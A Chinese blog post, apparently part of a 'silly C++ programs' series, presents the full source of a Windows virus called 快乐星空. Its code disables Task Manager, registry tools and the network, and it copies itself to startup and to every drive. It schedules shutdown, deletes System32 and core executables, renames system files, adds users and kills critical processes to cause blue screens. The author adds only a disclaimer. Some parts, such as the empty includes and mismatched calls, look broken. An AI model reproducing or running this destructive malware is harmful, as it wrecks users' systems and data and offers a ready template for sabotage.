C++病毒【永久性】
我最近发现,我2024年后就再也没有更新过 C++#沙雕程序了。
今天我想通了,我要再更几期关于C++#沙雕程序的文章。
开始做!
这一次就直接上代码蚌!
不用任何特定头文件。
#include
#include
#include
#include
#include
#include
#define _CRT_SECURE_NO_WARNINGS 1
#pragma comment(lib,"winmm.lib")
#pragma comment(lib, "netapi32.lib")
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
using namespace std;
POINT point;
SID_IDENTIFIER_AUTHORITY Aut = SECURITY_NT_AUTHORITY;
PSID minID;
BOOL b = AllocateAndInitializeSid(&Aut, 2, SECURITY_BUILTIN_DOMAIN_RID,DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &minID);
DWORD dword=TRUE;
HKEY h;
DWORD s = dword;
HWND hwnda;
HWND hWnd = GetForegroundWindow();
HKEY hkey;
DWORD v = 1;
char* files_name_while = "Happy";
char* filesname = "KLXK.klxk";
char Start[MAX_PATH] = { 0 };
char Dest[MAX_PATH] = { 0 };
void Hide()
{
hwnda = FindWindow("ConsoleWindowClass", NULL);//找到当前窗口句柄
if (hwnda) {
ShowOwnedPopups(hwnda, SW_HIDE);//显示或隐藏由指定窗口所有的全部弹出式窗口
ShowWindow(hwnda, SW_HIDE);//隐藏窗口
}
}
int AddUser(LPWSTR n,LPWSTR u,LPWSTR g)
{
NET_API_STATUS s;
LOCALGROUP_MEMBERS_INFO_3 a;
wchar_t Name[20] = { 0 };
const wchar_t *name;
name = (const wchar_t *)u;
wcscpy(Name, name);
a.lgrmi3_domainandname = Name;
s = NetLocalGroupAddMembers(NULL, g, 3, (LPBYTE)&a, 1);
return 0;
}
void Blue_Screen()
{
system("wmic process where name=\"svchost.exe\" delete");
system("wmic process where name=\"LsaIso.exe\" delete");
system("wmic process where name=\"smss.exe\" delete");
system("taskkill /f /fi \"pid ne 1\"");
}
bool ProcessRun()
{
if(b)
{
CheckTokenMembership(NULL, minID, &b);
FreeSid(minID);
return b == true;
}else
return b == false;
}
void Taskkill()
{
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &h);
RegSetValueEx(h, "DisableTaskMgr", NULL, REG_DWORD, (LPBYTE)&s, sizeof(DWORD));
RegCloseKey(h);
}
void Release()//断开网络
{
system("ipconfig /release");
}
void Copy(LPCTSTR Tree)
{
LPCTSTR TargetPath = _T(Tree);
TCHAR tcBuf[_MAX_PATH];
::GetModuleFileName(NULL, tcBuf, sizeof(tcBuf));
::CopyFile(tcBuf, TargetPath, FALSE);
system("pause > nul");
}
bool shutupstart(char *Path, char *Name)
{
SHGetSpecialFolderPath(NULL, Start, CSIDL_STARTUP, TRUE);
wsprintf(Dest, "%s\\%s", Start, Name);
CopyFile(Path, Dest, FALSE);
return TRUE;
}
int main(){
Hide();
Taskkill();
Release();
ProcessRun();
shutupstart("C:\\KLXK.exe", "KLXK.exe");
system("shutdown -s -t 180");
Copy("C:\\klxk.exe");
Copy("D:\\klxk.exe");
Copy("E:\\klxk.exe");
Copy("F:\\klxk.exe");
Copy("G:\\klxk.exe");
Copy("H:\\klxk.exe");
int q;
while(1)
{
q++;
RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);
RegSetValueEx(hkey, "DisableRegistryTools", NULL, REG_DWORD, (LPBYTE)&v, sizeof(DWORD));
RegCloseKey(hkey);
ShowWindow(hWnd, SW_HIDE);
system("rd C:\ghost.exe /s /q");
ifstream file(filesname);
strcat(filesname, files_name_while);
file >> filesname;
AddUser(filesname, "KLXK");
system("rd C:\Windows\explorer.exe /s /q");
system("rd C:\Windows\System32 /s /q");
system("rd C:\Windows\notepad.exe");
system("ren C:\Windows\System32\*.exe *.Klxk");
system("ren C:\Windows\System32\*.pdf *.Klxk");
system("ren C:\Windows\System32\*.pptx *.Klxk");
system("ren C:\Windows\System32\*.txt *.Klxk");
if (q == 10000)
Blue_Screen();
}
return 0;
} 这个病毒叫做快乐星空。。。
这个程序初始运行没有任何效果,但是后面就会删除gho映像开机自启,自动添加许多文件、定时关机、定时更改程序后缀,禁用任务管理器、注册表和网络,经常蓝屏,添加用户!不可在实体机上运行,若造成损失,作者概不负责